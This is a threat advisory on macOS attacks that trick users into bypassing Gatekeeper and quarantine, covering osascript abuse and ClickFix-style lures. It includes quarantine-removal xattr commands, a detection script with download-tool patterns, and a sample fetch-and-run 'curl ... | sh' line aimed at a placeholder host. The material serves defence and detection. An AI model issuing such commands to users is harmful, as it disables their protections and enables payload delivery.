2025-11-27

Systems Trust Controls are under active, repeated attack

Level: Strategic | Source: Cryptocurrency, Government, Technology, Finance & Technology

macOS systems are experiencing a significant surge in attacks specifically designed to bypass Apple's built-in security controls: Gatekeeper, XProtect, and quarantine protections. Threat actors have shifted from exploiting technical vulnerabilities to exploiting user trust, using social engineering to trick users into disabling their own security protections. These attacks succeed because they do not rely on software bugs; instead, they manipulate legitimate macOS features and user behavior.


Business Impact:

  • Credential Theft: Complete access to passwords, API keys, SSH keys, cloud credentials
  • Cryptocurrency Loss: Wallet seed phrases stolen, funds drained (average loss: $18,000-$280,000 per victim)
  • Intellectual Property: Source code, trade secrets, customer data exfiltrated
  • Supply Chain Compromise: Developer access used to inject malware into production systems

Observed patterns:

Pattern 1: AppleScript Living-Off-the-Land Abuse

Technique: Attackers abuse osascript (Apple's legitimate AppleScript execution tool) to spawn shell processes that download and execute malicious payloads. This technique exploits the trust relationship between:

  • AppleScript/Script Editor (signed by Apple, trusted)
  • Shell interpreters (bash, zsh, sh)
  • Network download tools (curl, wget, fetch)

Why It Works:

  • No malicious files required initially - Attack starts with legitimate Apple binary (osascript)
  • Bypasses Gatekeeper - osascript is signed by Apple and trusted by the system
  • Living-off-the-land - Uses only tools already present on every macOS system
  • User-assisted execution - Users click "Run" in Script Editor or execute commands from Terminal
  • Multi-stage delivery - Initial .scpt file appears benign, downloads real payload during execution

Pattern 2: Gatekeeper/Quarantine Bypass

Technique: Users are instructed to remove quarantine attributes via Terminal commands:

Common Commands:

  • xattr -d com.apple.quarantine /path/to/application.app
  • xattr -c /path/to/file (removes ALL extended attributes)
  • xattr -r -d com.apple.quarantine /Applications/SuspiciousApp.app

Why It Works:

  • macOS Gatekeeper only checks files with quarantine attributes
  • Removing the quarantine attribute means no Gatekeeper warning appears when the file is opened
  • Users believe they're "fixing" a legitimate application
  • Social engineering makes users disable their own protection
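A detection-side view of both patterns (the osascript-to-shell download chain from Pattern 1 and the xattr quarantine removal from Pattern 2), as an added example that is not code from the original advisory or from Anvilogic. It runs two rules over constructed process-event records shaped like a generic endpoint telemetry feed (parent image name, process image name, full command line). The field names, the "Script Editor" image name, the hostnames and paths, and every sample command line are assumptions made for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed detection example for the two patterns described above. This is
# not code from the original advisory; the event shape (parent, process,
# cmdline) and the sample events are assumptions mimicking endpoint telemetry.

SHELLS = {"sh", "bash", "zsh"}
SCRIPT_HOSTS = {"osascript", "Script Editor"}          # Apple-signed script hosts
DOWNLOADER_RE = re.compile(r"\b(curl|wget|fetch)\b")    # network download tools
QUARANTINE_XATTR = "com.apple.quarantine"


@dataclass(frozen=True)
class ProcessEvent:
    parent: str    # image name of the parent process
    process: str   # image name of the process itself
    cmdline: str   # full command line as the sensor recorded it


def detect_osascript_lotl(ev: ProcessEvent) -> bool:
    """Pattern 1: an Apple-signed script host spawns a shell whose command
    line calls a download tool. AppleScript's `do shell script` runs its
    argument through /bin/sh, so the chain appears as
    osascript -> sh -c '... curl ...'."""
    return (
        ev.parent in SCRIPT_HOSTS
        and ev.process in SHELLS
        and DOWNLOADER_RE.search(ev.cmdline) is not None
    )


def _xattr_flags(cmdline: str) -> str:
    """Collect the letters of every short option on an xattr command line so
    that combined forms such as `-rd` are treated the same as `-r -d`."""
    return "".join(
        tok.lstrip("-")
        for tok in cmdline.split()[1:]
        if tok.startswith("-") and tok != "--"
    )


def detect_quarantine_removal(ev: ProcessEvent) -> bool:
    """Pattern 2: xattr strips the quarantine attribute, either by name
    (-d com.apple.quarantine, optionally with -r) or wholesale (-c clears
    every extended attribute, quarantine included). Read-only use such as
    `xattr -p com.apple.quarantine file` is deliberately not flagged."""
    if ev.process != "xattr":
        return False
    flags = _xattr_flags(ev.cmdline)
    if "c" in flags:
        return True
    return "d" in flags and QUARANTINE_XATTR in ev.cmdline.split()


RULES = (
    ("osascript_lotl", detect_osascript_lotl),
    ("quarantine_removal", detect_quarantine_removal),
)


def triage(events: list[ProcessEvent]) -> list[tuple[str, str]]:
    """Return (rule_name, cmdline) for every event that matches a rule."""
    hits: list[tuple[str, str]] = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev.cmdline))
    return hits


# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("osascript", "sh",
                 "sh -c 'curl -fsSL http://payload.example.invalid/stage2 | sh'"),
    ProcessEvent("Terminal", "xattr",
                 "xattr -d com.apple.quarantine /Applications/SuspiciousApp.app"),
    ProcessEvent("Terminal", "xattr", "xattr -c /Users/jdoe/Downloads/Installer.dmg"),
    ProcessEvent("Terminal", "xattr",
                 "xattr -rd com.apple.quarantine /Applications/SuspiciousApp.app"),
    # Benign: inspecting the attribute, not removing it
    ProcessEvent("Terminal", "xattr",
                 "xattr -p com.apple.quarantine /Users/jdoe/Downloads/file.zip"),
    # Benign: user-run curl from Terminal, no script host in the chain
    ProcessEvent("Terminal", "zsh", "zsh -c 'curl -s https://api.example.invalid/health'"),
    # Benign: AppleScript running a local listing, no download tool
    ProcessEvent("osascript", "sh", "sh -c 'ls -la /Users/jdoe/Desktop'"),
]

if __name__ == "__main__":
    for rule, cmd in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Run stand-alone, the script reports one osascript_lotl hit and three quarantine_removal hits out of the seven constructed events. The `-c` case is flagged because clearing all extended attributes removes quarantine as a side effect, which is exactly why the "Common Commands" list above includes it; `-p` is excluded so that administrators inspecting a download do not generate noise.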

Distribution Methods:

  • Fake Apple Support websites (SHAMOS campaign)
  • ClickFix/FakeCAPTCHA pages with step-by-step instructions
  • Reddit/forum posts claiming "solution" to app installation problems
  • Malvertising redirecting to pages with "fix" instructions

Real-World Usage:

  • SHAMOS Campaign: "Verify You Are Human" fake CAPTCHA instructing Terminal commands
  • ClickFix Campaigns (2024-2025): 517% increase in H1 2025 (ESET), becoming #2 attack vector after phishing, accounting for 8% of all blocked attacks
  • Malvertising: Google Ads leading to fake software sites requiring quarantine removal
